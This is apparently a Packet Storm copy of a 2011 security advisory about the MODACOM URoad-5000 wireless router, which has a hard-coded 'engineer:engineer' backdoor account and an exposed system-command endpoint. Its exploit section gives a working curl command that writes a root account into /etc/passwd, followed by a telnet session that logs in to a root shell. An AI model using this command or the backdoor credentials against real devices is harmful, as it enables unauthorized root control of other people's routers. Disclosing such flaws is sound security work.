exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MODACOM URoad-5000 1450 Command Execution

MODACOM URoad-5000 1450 Command Execution
Posted Jun 2, 2011
Authored by Alex Stanev | Site sec.stanev.org

MODACOM URoad-5000 version 1450 has a hard-coded backdoor account that allows for remote command execution.

tags | exploit, remote
SHA-256 | 7aa00fead7d830e9d8dce87c99dd46947c5558d1709822584f40bcd93224942c

MODACOM URoad-5000 1450 Command Execution

Change Mirror Download
      ================================================
== Alex Stanev Security Advisory #4 @31.05.2011 ==
== http://sec.stanev.org ==
================================================

PRODUCT
URoad-5000

VENDOR
MODACOM [http://www.modacom.co.kr]

VERSIONS AFFECTED
v1450

CLASS
Remote command execution/Backdoor

PRODUCT DESCRIPTION
URoad-5000 is integrated battery powered wireless router. It comes with only one external USB
interface and no other hardware comm interfaces (such as ethernet). Based on RaLink SoC 3050.
The USB port is used for connection with MW-U3050, which is USB WiMAX dongle.
Linux inside.
Often marketed as WiMAX 2 WiFi "converter".

THE PROBLEM
The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP.
1) Web administration interface can be accessed with standard user/password pair admin:admin
This can be later changed, but there is another possible access pair - engineer:engineer
and it can't be changed via the web interface.
2) Some of the SDK standard scripts are left and their screens in the web interface are just
HTML commented. This reveals the /goform/SystemCommand method.

EXPLOIT
1) Remote add r00t user with password boza
$curl --basic -u "engineer:engineer" \
-d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" \
192.168.100.254/goform/SystemCommand
$telnet 192.168.100.254
Trying 192.168.100.254...
Connected to 192.168.100.254.
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

ADDITIONAL INFO
The flaw was presented on OpenFest 2010.
Presentation: http://openfest.org/files/slides-2010/OpenFest2010_Reverse_engineering_Alex_Stanev.pdf [in bulgarian]

PATCH/WORKAROUND
No workaround possible. Next version?

VENDOR STATUS
NOT informed. Backdoor.

=========================
== EOF ==
== http://sec.stanev.org ==
=========================

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close